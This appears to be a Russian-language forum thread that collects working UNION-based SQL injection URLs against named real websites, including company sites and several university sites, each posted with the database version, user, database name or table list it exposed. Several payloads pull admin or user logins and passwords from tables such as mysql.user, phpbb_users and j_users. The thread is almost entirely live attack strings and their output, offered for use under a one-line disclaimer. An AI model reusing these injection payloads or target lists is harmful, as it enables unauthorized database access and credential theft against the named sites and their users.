SQL Инъекции

http://www.lomospain.com/tienda/detalle.php?id=-235+union+select+1,2,3,version%28%29,5--
Version: 4.1.20
Database: lomospain
User: lomospain@localhost

 

http://yahoo.jponline.ru/main.php?id=2084048437+and+substring(version(),1,1)=5

 

МОСТУРФЛОТ

http://www.mosturflot.ru/seacruises/ships/index.php?ship_id=-80+and+1=2+union+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4+--


version : 5.0.83
user : mosturflot@localhost
database : mosturflot
os : alt-linux-gnu

http://www.mosturflot.ru/seacruises/ships/index.php?ship_id=-80+and+1=2+union+select+1,concat_ws(0x3a,name,username,password,email),3,4+from+j_users+limit+0,1--

 

Code:

http://www.windowware.co.uk/product_list.php?m=-1+union+select+1,2,user(),database(),5,6,7,8,version(),10--

User: windowweb
Database: ww_sys@localhost
Version: 4.1.22

Я вернулся

Code:

http://www.aspect.dubna.ru/new/page.php?page=301+union+select+concat_ws(0x3a,user(),version(),database())--

User: aspect@localhost
Database: aspect
Version: 5.0.51a-log

 

PR 4

Code:

http://www.pritchi.net/modules/arms/index.php?cat=-1+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,2,3%20--

user : shurko@localhost
version : 4.1.20
database : www_pritchi_net_-_pritchi

 

http://www.retirevic.com.au/about.php?id=-3+union+select+1,2,3,group_concat(0x0b,user_id,0x3a,user_password)+from+rv_auth_user--

 

http://www.outrest.ru/board/board-bike/index.php?oid=-792+and+1=2+union+select+1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12--

version : 4.1.22-lk-log
user : collspbru_rest@localhost
database : collspbru_rest
0s : pc-linux-gnu

 

Host Information

Server = Apache
Version = 5.1.45-1~bpo50+1-log
Powered by = PHP/5.2.6-1+lenny8
Attack Type = SQL Union Injection
Current User = [email protected]
Current Database = g_spatialhistory_shwebsite
Supports Union = yes
Union Columns = 16


Vuln: http://www.stanford.edu/group/spatialhistory/cgi-bin/site/viz.php?id=121+and+1=0+ Union Select 1,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10,11,12,13,14,15,16

 

Code:

http://zoolinks.info/info.php?id=1+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables+limit+0,1%20--

user : [email protected]
version : 5.0.37-standard
database: webtrudi_zoo
os : pc-linux-gnu

 

http://vlauto.ru/cars/index.php?idbrand=-9+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),12+--&id=2

version : 5.0.91-community-log
user : vlautoru_auto@localhost
atabase : vlautoru_db
os : unknown-linux-gnu

 

ТИЦ 30 ПР 4
http://www.stroika.md/detail.php?id=-1703+union+select+1,2,3,concat_ ws(0x3a,user,password),5,6,7 ,8+from+mysql.user--
вывод в тайтл

 

Моя первая

http://www.worstpreviews.com/headline.php?id=-17072+union+select+1,version(),3,4,5,6,7,8--+

Version: 5.0.90-log
User: alexgi_2@localhost
Database: alexgi_worstreview@localhost

-------------------------------------------------------------------------------------------------

и еще одна

http://www.steinerbooks.org/p.php?id=-11+union+select+1,version()29,3,4,5,6,7,8,9--+

version: 4.1.22
user:anthroposophic@localhost

---------------------------------------------------------------------------------------------------

http://www.giuciao.com/books/book.php?id=-3748+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+

version: 5.0.32-Debian_7etch5
user: [email protected]

 

http://www.wscal.edu/bookstore/store/details.php?id=-2022+union+select+1,concat_ws(0x3a,user(),version()),3,4,5,6,7,8,9,10,11--+

wmsem28_wmsem28@localhost:4.0.27-standard

 

Code:

http://www.barcelo.edu.ar/vernoticia.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,unhex(hex(concat_ws(0x3a,user(),version(),database()))),12,13,14,15,16,17,18,19,20,21--

Username: uv0001@localhost
Version: 4.1.14-log
Database: uv0001_barcelo

Code:

http://www.ms.edu.mn/index.php?option=user_com_sambar&parent=5&id=4&menu_id=5+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user(),version(),database()))),5,6,7,8--

Username: mat@localhost
Version: 5.0.75-0ubuntu10.2
Database: mathweb

Дальнейшая информация только в ознакомительных целях. Ответственности за Ваши действия я не несу.

Доступны данные из таблицы v2_users.

Code:

http://www.ms.edu.mn/index.php?option=user_com_sambar&parent=5&id=4&menu_id=5+union+select+1,2,3,4,concat_ws(0x3a,user_name,password),6,7,8+from+v2_users--

Tables:

Code:

v2_abouts 
v2_artgallery 
v2_artpicture 
v2_banner 
v2_banner_list 
v2_comment 
v2_components 
v2_contact 
v2_feedback 
v2_gallery 
v2_gallery_tech 
v2_hevlel 
v2_lesson 
v2_menu 
v2_news 
v2_open 
v2_permission 
v2_picture 
v2_position 
v2_professor 
v2_professor_type 
v2_promenu 
v2_research 
v2_sambar 
v2_sent_message 
v2_site_banner 
v2_site_banner_list 
v2_slide 
v2_subsystems 
v2_theachers 
v2_update_type 
v2_updates 
v2_user2type 
v2_user_type 
v2_users 
v2_web 
v2_weblink 
v2_weblink_type 
v2_work 
v2_zarlal

Code:

http://www.ptoservis.ru/photo.php?id=2525+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--

Username: [email protected]
Version: 5.0.67-log
Database: u45581

Code:

http://www.litinstitut.ru/index.php?p=gallerypic&img_id=-1+union+select+1,2,3,4,5,6,database(),8,9--

Username: root@localhost
Version: 4.1.22-community-nt
Database: site

 

Code:

http://трансгарант.[COLOR=Lime]рф[/COLOR]/en/press-center/press-release/index.php?id=911+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9

database:wwwtransgarantlg
version:4.0.25
user:[email protected]

 

Code:

http://www.metaltorg.ru/catalogue/show.php?id=-22533+union+select+1,version() -- 

5.0.67-log

Code:

Account
Account_Banner
Account_Restriction
Admin
Ban_Place
Ban_Type
Banner
Banner_Restriction
Censor
Cli

Code:

http://www.metaltorg.ru/catalogue/show.php?id=-22533+union+select+1,concat_ws%280x3a,Adm_login,Adm_Password%29+from+banner.Admin -- 

PR5

 

Code:

http://www.aladeo.ru/video/show.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11--

Username: Eugene@localhost
Version: 5.0.45-community-nt
Database: artvideo2

Tables:

Code:

pma
table
info

Code:

http://www.olimpgroup.ru/index.php?ob=list_one&id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--

Username: olimpgro@localhost
Version: 4.1.25-log
Database: wwwolimpgroupru

Code:

http://izottex.ru/index.php?page=page&id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),7--

Username: neosphru_iztx@localhost
Version: 5.0.26-log
Database: neosphru_iztx
OS: pc-linux-gnu

Code:

http://www.gilsf.ru/order/?comid=-1+union+select+1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13--

Username: [email protected]
Version: 5.0.90-log
Database: u68927
OS: portbld-freebsd7.2

Таблицы выводить лимитом.

 

ГородРязань.ru

http://www.gorod.ryazan.ru/catalog/index.php?category=-2+and+1=2+union+select+1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5+--

version : 4.1.22-standard-log
user : gorodry_ght@localhost
database : gorodry_ctlg
os : pc-linux-gnu

 

Code:

http://www.profileracing.com/news_full.php?id=-1001+union+select+concat(version(),0x20,database(),0x20,user()),2,3,4,5,6,7--

5.1.47-community-log
profiler_web
profiler_webuser@localhost

Code:

http://depts.washington.edu/engl/people/profile.php?id=-29+union+select+concat(version(),0x20,database(),0x20,user()),2,3--

5.0.27-standard
engl
[email protected]

Code:

http://library.uncc.edu/knowledgebase/question.php?q=-317+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9--

5.0.32-Debian_7etch8-log
silk
mozilla@localhos

Code:

http://support.pa.msu.edu/howto.php?id=-95+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14--

5.0.77
supportsite
[email protected]

Code:

http://www.worstpreviews.com/headline.php?id=-17882+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8--

5.0.90-log
alexgi_worstreview
alexgi_2@localhost

Code:

http://dl.lib.brown.edu/francophone/browse2.php?id=-4+and+1=2+union+select+1,2,3,4,5,6,7,8,unhex(hex(concat(version(),0x20,database(),0x20,user())))--+

4.1.22
francophone
guest@localhost

http://www.mgwalk.com/Temp_Topic_View.php?ID=-16+union+select+1,concat(username,0x20,user_password,0x20,user_type),3,4,5,6,7,8,9,10,11,12,13,14+from+phpbb_users+limit+1,1--

http://campus.augustana.edu/acknowledge/template.php?id=-418+union+select+1,2,concat(username,0x20,password),4,5,6,7,8+from+alumniadmin.users+limit+1,1--

http://ebusiness.byu.edu/book_review.php?ID=-6+union+select+1,concat(password,0x20,netID),3,4,5,6,7,8,9,10+from+wd_user+limit+7,1--

 

Code:

http://rybalka.zooclub.ru/indexr.php?id=-5+union+select+table_name,2+from+information_schema.tables --

user : zooclub_zooclub@localhost
version : 5.0.91-community-log
database : zooclub_rybalka